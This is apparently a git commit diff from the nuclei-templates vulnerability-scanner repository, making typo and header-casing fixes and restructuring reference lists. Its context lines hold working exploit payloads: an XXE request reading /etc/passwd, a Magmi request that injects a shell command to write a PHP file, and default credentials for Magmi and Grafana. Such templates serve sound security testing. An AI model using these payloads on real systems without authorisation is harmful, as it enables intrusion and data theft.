Misc (minor)

Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84
2021-08-19 17:25:01 +03:00 · 2021-08-19 17:25:01 +03:00 · 2a320412bf
parent 002e8db616
commit 2a320412bf
8 changed files with 13 additions and 12 deletions
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@ -53,7 +53,7 @@ git checkout -b template_branch_name
 git add .
 ```

- To commit give a descriptive message for the convenience of reveiwer by:
+- To commit, give a descriptive message for the convenience of the reviewer by:

 ```sh
 # This message get associated with all files you have changed
--- a/cves/2017/CVE-2017-7391.yaml
+++ b/cves/2017/CVE-2017-7391.yaml
@ -6,8 +6,9 @@ info:
  severity: medium
  description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
  tags: cve,cve2017,magmi,xss
-  reference: https://github.com/dweeves/magmi-git/issues/522
-  # Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
+  reference:
+    - https://github.com/dweeves/magmi-git/issues/522
+    - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip

 requests:
  - method: GET
--- a/cves/2020/CVE-2020-11991.yaml
+++ b/cves/2020/CVE-2020-11991.yaml
@ -14,7 +14,7 @@ requests:
    path:
      - "{{BaseURL}}/v2/api/product/manger/getInfo"
    headers:
-      Content-type: "text/xml"
+      Content-Type: "text/xml"
    body: |
      <!--?xml version="1.0" ?-->
      <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
--- a/cves/2020/CVE-2020-25223.yaml
+++ b/cves/2020/CVE-2020-25223.yaml
@ -19,7 +19,7 @@ requests:
        Accept-Encoding: gzip, deflate
        X-Requested-With: XMLHttpRequest
        X-Prototype-Version: 1.5.1.1
-        Content-type: application/json; charset=UTF-8
+        Content-Type: application/json; charset=UTF-8
        Origin: {{BaseURL}}
        Connection: close
        Referer: {{BaseURL}}
--- a/cves/2020/CVE-2020-5776.yaml
+++ b/cves/2020/CVE-2020-5776.yaml
@ -17,14 +17,14 @@ requests:
      - |
        POST /magmi/web/magmi_saveprofile.php HTTP/1.1
        Host: {{Hostname}}
-        Content-type: application/x-www-form-urlencoded
+        Content-Type: application/x-www-form-urlencoded
        Connection: close

        profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
      - |
        POST /magmi/web/magmi_run.php HTTP/1.1
        Host: {{Hostname}}
-        Content-type: application/x-www-form-urlencoded
+        Content-Type: application/x-www-form-urlencoded
        Connection: close

        engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update
--- a/cves/2020/CVE-2020-5777.yaml
+++ b/cves/2020/CVE-2020-5777.yaml
@ -10,7 +10,7 @@ info:

  # Response code 503 indicates a potential successful "Too many connections" error
  # While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
-  # whith default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
+  # with default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
  # Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100

 requests:
--- a/default-logins/grafana/grafana-default-credential.yaml
+++ b/default-logins/grafana/grafana-default-credential.yaml
@ -23,8 +23,7 @@ requests:
        - prom-operator
        - admin

-    # Added default grafana and prometheus user.
-    # Source: https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
+    # Added default grafana and prometheus user. reference[2]

    attack: sniper

--- a/technologies/magento-detect.yaml
+++ b/technologies/magento-detect.yaml
@ -5,6 +5,8 @@ info:
  author: TechbrunchFR
  severity: info
  description: Identify Magento
+  reference:
+    - https://devdocs.magento.com/guides/v2.4/graphql/
  tags: magento

 requests:
@ -14,8 +16,7 @@ requests:
      - '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}'

      # There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when
-      # consumed by a SPA/PWA app so we need a valid GraphQL query from Magento to check
-      # https://devdocs.magento.com/guides/v2.4/graphql/
+      # consumed by a SPA/PWA app, so we need a valid GraphQL query from Magento to check reference[1]

    matchers-condition: or
    matchers: